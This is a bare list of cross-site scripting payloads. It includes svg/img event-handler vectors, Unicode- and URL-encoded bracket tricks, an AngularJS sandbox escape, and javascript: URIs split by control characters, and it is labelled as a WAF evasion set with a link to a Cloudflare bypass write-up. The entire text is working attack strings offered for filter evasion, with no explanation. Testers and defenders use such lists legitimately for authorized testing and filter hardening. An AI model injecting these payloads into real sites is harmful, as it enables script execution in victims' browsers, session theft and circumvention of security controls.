%u003Csvg onload=alert(1)> \
%u3008svg onload=alert(2)> \
%uFF1Csvg onload=alert(3)> \
=<img%20src=x%20onerror=alert('Welcome,%20v
q=<g><script>alert%28document.domain%29<%2Fscript>   
<img src=x onerror=console.log("XSS")>   
‘);</script><script>alert(1)</script>  
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
";(a=alert,b=1,a(b))// ( 200 OK )

java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript
pjavascriptt:confirm`0`

evasionwaf
https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312
